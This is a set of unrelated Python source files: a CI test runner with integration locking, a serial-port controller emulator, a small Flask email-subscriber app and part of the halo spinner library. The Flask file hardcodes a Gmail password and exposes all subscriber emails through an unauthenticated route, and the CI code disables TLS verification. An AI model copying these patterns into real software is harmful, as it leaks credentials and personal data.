proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(xsoar_client, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(proxy=proxy.ami.docker_ip + ':' + proxy.PROXY_PORT,
username=demisto_user, password=demisto_pass,
server=server)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_user, demisto_pass,
demisto_api_key, prints_manager, thread_index=thread_index)
proxy.configure_proxy_in_demisto(username=demisto_user, password=demisto_pass, server=server)
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
if exc.__class__ == ApiException:
error_message = exc.body
else:
error_message = f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}'
prints_manager.add_print_job(error_message, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
    If it is - it means we have already executed this test, i.e. a full round has completed and there are tests
    that could not be locked by this execution.
    In that case we start monitoring a new round by emptying the 'executed_in_current_round' set and sleeping
    in order to let the locked tests be released.
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
        The updated executed_in_current_round set: reset to contain only the current test configuration if a round
        was completed, otherwise the set with the current test added to it.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
        tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be run
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
        # This case is rare, and usually occurs in two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
            print_warning('Add pull request comment failed: There is more than one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
    res_dict = response.json()
    if not response.ok:
        print_warning('Add pull request comment failed: {}'.format(res_dict.get('message')))
    return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
    Execution is as follows:
    * Attempts to lock the test's integrations and yields the result of this attempt
    * If the lock attempt fails - yields False, if it succeeds - yields True
    * Once the test is done - unlocks all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
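# Hedged usage sketch (not called anywhere in this module): how a caller is expected to drive the
# context manager above. The integration details and the conf.json path below are hypothetical.
def _example_acquire_test_lock_usage(prints_manager):
    example_integrations = [{'name': 'SomeIntegration'}]  # hypothetical integration details
    with acquire_test_lock(example_integrations,
                           test_timeout=300,
                           prints_manager=prints_manager,
                           thread_index=0,
                           conf_json_path='./Tests/conf.json') as locked:  # hypothetical path
        if locked:
            pass  # run the test here; the integrations are unlocked automatically on exit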
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
    This method safely unlocks the test's integrations.
    If an unexpected error occurs - this method will log its details and the execution of other tests will continue
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
        # executing the test could take a while, re-instantiating the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
    This method safely locks the test's integrations and returns the result.
    If an unexpected error occurs - this method will log its details and return False
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
if integration_names:
print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
else:
print_msg = 'No integrations to lock'
prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
    This method takes a workflow id and checks if the workflow is still running.
    If the given workflow ID is the same as the current workflow, it will simply return True,
    else it will query the CircleCI API for the workflow and return its status
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
        # Each file has content in the form of <workflow-id>:<circleci-build-number>:<timeout in seconds>
        # If the lock has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
                f'Could not lock integration {integration}, another lock file already exists with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
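# Illustrative sketch: the lock files handled above hold "<workflow-id>:<build-number>:<timeout>" as a
# single string, so reading one back is a plain split. The content below is made up for the example.
def _example_parse_lock_file_content():
    example_content = 'abcd-1234-workflow:56789:330'  # hypothetical lock file content
    workflow_id, build_number, lock_timeout = example_content.split(':')
    return workflow_id, build_number, int(lock_timeout)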
def get_integrations_list(test_integrations: list) -> list:
"""
    Since test details can have a single integration as a string or a list of integrations - this method
    parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
        a list of the names of all the integrations that take part in the test
        specified in the test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
    Each file should contain <workflow-id>:<circle-ci-build-number>:<test-timeout>
    where the workflow id and build number parts are for debugging and troubleshooting
    and the <test-timeout> part makes it possible to unlock lock files of revoked tests.
    If the lock file creation fails for any of the integrations - the files already created will be cleaned up.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
        test_timeout: The test timeout in seconds
        thread_index: The index of the thread that executes the locking
    Returns:
        True if lock files were created for all the integrations, else False
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
                f'Could not lock integration {integration}, file creation with precondition failed. '
                f'Delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
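# Illustrative sketch of the generation precondition used above: passing if_generation_match=0 makes the
# upload succeed only when the object does not exist yet, so two concurrent builds cannot both create the
# same lock file. The bucket and blob names below are hypothetical, not the real lock bucket.
def _example_create_lock_with_precondition(storage_client):
    bucket = storage_client.bucket('example-locks-bucket')   # hypothetical bucket
    blob = bucket.blob('content-locks/SomeIntegration')      # hypothetical lock path
    try:
        blob.upload_from_string('workflow-id:12345:330', if_generation_match=0)
        return True   # lock acquired
    except PreconditionFailed:
        return False  # another build already holds the lock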
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
            # Verifying the build number is the same as the current build number to avoid deleting other tests' lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
        A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that have a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
    Checks whether more time than 'lock_timeout' has passed since the 'lock_file' was last updated.
    If not - it means the integration represented by the lock file is currently locked and is being tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
        True if the lock has exceeded its timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
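# Small sketch of the expiry check above with concrete numbers; the timestamps are invented for illustration.
def _example_lock_expired():
    updated = datetime.datetime.now(tz=pytz.utc) - datetime.timedelta(seconds=400)  # hypothetical last update
    lock_timeout = '330'
    # 400 seconds have passed since the (hypothetical) last update, so a 330-second lock counts as expired.
    return datetime.datetime.now(tz=pytz.utc) - updated >= datetime.timedelta(seconds=int(lock_timeout))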
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
        print('[{}] sleeping for 45 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
scu.py
|
from enum import Enum
import time
import serial
import threading
class Status(Enum):
STOPPED = 'S'
    JOGGINGFORWARD = 'F'
    JOGGINGREVERSE = 'R'
PAUSED = 'P'
ERROR = 'E'
class ProtcolMessage(Enum):
    ENQ = chr(133) # <ENQ> in ascii + 128
NULL = chr(128) # <Null>: 0 + 128
ACK = chr(134) # 6 + 128
CR = chr(141) # 13 + 128
#CR = chr(13)
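# Illustrative sketch (an assumption drawn from the comments above, not part of the original protocol code):
# the controller appears to use ASCII control codes with the high bit set, i.e. chr(code + 128).
def _example_protocol_byte_values():
    return {
        'ENQ': ord(ProtcolMessage.ENQ.value),  # 5 + 128 == 133
        'ACK': ord(ProtcolMessage.ACK.value),  # 6 + 128 == 134
        'CR': ord(ProtcolMessage.CR.value),    # 13 + 128 == 141
    }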
class CommandCode(Enum):
SCAN = "G"
PAUSE = "P"
STOP = "S"
HOME = "H"
SLEW = '9'
JOGFORWARD = "F"
JOGREVERSE = "R"
FASTERJOG = "Q"
SLOWERJOG = "Z"
SCANMODE = "B"
UNITS = "U"
BURSTFIRE = "L"
NEXTPOSITION = "N"
SHGRETURN = "C"
SHGALIGN = "K"
SHGFORWARD = "D"
SHGREVERSE = "E"
SHGJOGCRYSTAL = "I"
SHGJOGPRISM = "J"
class SCU():
    def __init__(self):
        self.units = ["W", "D", "N"]
        self.unit = "W"  # wavenumbers
        self.position = 15000  # Start at 15000
        self.status = Status.STOPPED  # Start as stopped
def slew(self, new_position):
if new_position < self.position:
self.status = Status.JOGGINGREVERSE
while new_position != self.position and self.status != Status.STOPPED:
self.position -= 1
time.sleep(.1)
else:
self.status = Status.JOGGINGFORWARD
while new_position != self.position and self.status != Status.STOPPED:
self.position += 1
time.sleep(.1)
self.status = Status.STOPPED
    def jog_forward(self):
        self.status = Status.JOGGINGFORWARD
        while self.status != Status.STOPPED and getattr(self.jog_forward_thread, "forward_run", True):
            self.position += 1
            time.sleep(.1)
        self.status = Status.STOPPED
    def jog_reverse(self):
        self.status = Status.JOGGINGREVERSE
        while self.status != Status.STOPPED and getattr(self.jog_reverse_thread, "reverse_run", True):
            self.position -= 1
            time.sleep(.1)
        self.status = Status.STOPPED
    def to_status(self):
        return self.status.value + self.unit + str(self.position)
def stop(self):
if hasattr(self, "jog_reverse_thread") and self.jog_reverse_thread is not None:
self.jog_reverse_thread.reverse_run = False
self.jog_reverse_thread.join()
if hasattr(self, "jog_forward_thread") and self.jog_forward_thread is not None:
self.jog_forward_thread.forward_run = False
self.jog_forward_thread.join()
self.status = Status.STOPPED
def change_unit(self):
next_index = self.units.index(self.unit) +1
if next_index == 3:
next_index = 0
self.unit = self.units[next_index]
class SerialParser():
def __init__(self):
        self.ser = serial.Serial(port="/dev/ttyS0", baudrate=9600, timeout=.01,
                                 bytesize=serial.EIGHTBITS, stopbits=2, rtscts=True)
self.scu = SCU()
self.poll()
def poll(self):
null_count = 0
while True:
self.ser.flushInput()
if null_count == 45:
                print("Writing enq")
                self.ser.write(ProtcolMessage.ENQ.value)
                response_counter = 0
                command_buffer = list()
                while response_counter < 100:  # Limit to 100 characters received
                    received = self.ser.read()
                    if received != ProtcolMessage.CR.value and received != ProtcolMessage.ACK.value:
                        command_buffer.append(received)
                        response_counter += 1
                    else:
                        if received == ProtcolMessage.ACK.value:
                            command = ProtcolMessage.ACK.value
                        else:
                            command = self.parse_command(command_buffer)
                        self.execute_command(command)
                        print(command_buffer)
                        break
                null_count = 0
            else:
                self.ser.write(ProtcolMessage.NULL.value)
                null_count += 1
def parse_command(self, command_buffer):
command = command_buffer[0]
        print(command)
return command
    def execute_command(self, command, message=None):
        print("Command-->" + str(command))
        if command == ProtcolMessage.ACK.value or command == "0":
            print("Ack received")
            self.return_status()
        elif command == "U":
            self.scu.change_unit()
            self.return_status()
        elif command == "F":
            self.scu.jog_forward_thread = threading.Thread(target=self.scu.jog_forward)
            self.scu.jog_forward_thread.start()
            self.return_status()
        elif command == "R":
            self.scu.jog_reverse_thread = threading.Thread(target=self.scu.jog_reverse)
            self.scu.jog_reverse_thread.start()
            self.return_status()
        elif command == "S":
            self.scu.stop()
            self.return_status()
        else:
            self.return_error()
def return_status(self):
self.ser.write(self.scu.to_status()+"CS" + ProtcolMessage.CR.value)
def return_error(self):
self.ser.write("EE00000"+ProtcolMessage.CR.value)
ser_parse = SerialParser()
|
__init__.py
|
from flask import Flask, render_template, request, redirect, url_for
from flask_mail import Mail, Message
from threading import Thread
from flask_sqlalchemy import SQLAlchemy
import os
from models import *
base_url = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USERNAME'] = 'kfu.anatomy.2018@gmail.com'
app.config['MAIL_PASSWORD'] = 'z31aedc170f8'
app.config['MAIL_USE_TLS'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(base_url, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
mail = Mail(app)
db = SQLAlchemy(app)
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_message(form, email):
    msg = Message('New subscriber!', recipients=['kfu.anatomy.2018@gmail.com'], sender='kfu.anatomy.2018@gmail.com')
msg.html = render_template('email.html', result=form)
msg.body = 'New subscriber ' + email
t = Thread(target=send_async_email, args=[app, msg])
t.start()
return t
@app.route('/', methods=['POST', 'GET'])
def index():
if request.method == 'POST':
        if Email.query.filter_by(email=request.form['email']).first() is None:
e = Email(email=request.form['email'])
db.session.add(e)
db.session.commit()
send_message(request.form, request.form['email'])
return redirect(url_for('index'))
return render_template('index.html')
@app.route('/email')
def email_page():
q = Email.query.all()
result = ''
for i in q:
result += i.email + '\n'
return result
if __name__ == '__main__':
app.run()
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (colored_frame, decode_utf_8_text, get_environment,
get_terminal_columns, is_supported, is_text_type)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self._enabled = enabled # Need to check for stream
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers.
Returns
-------
None
"""
return self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
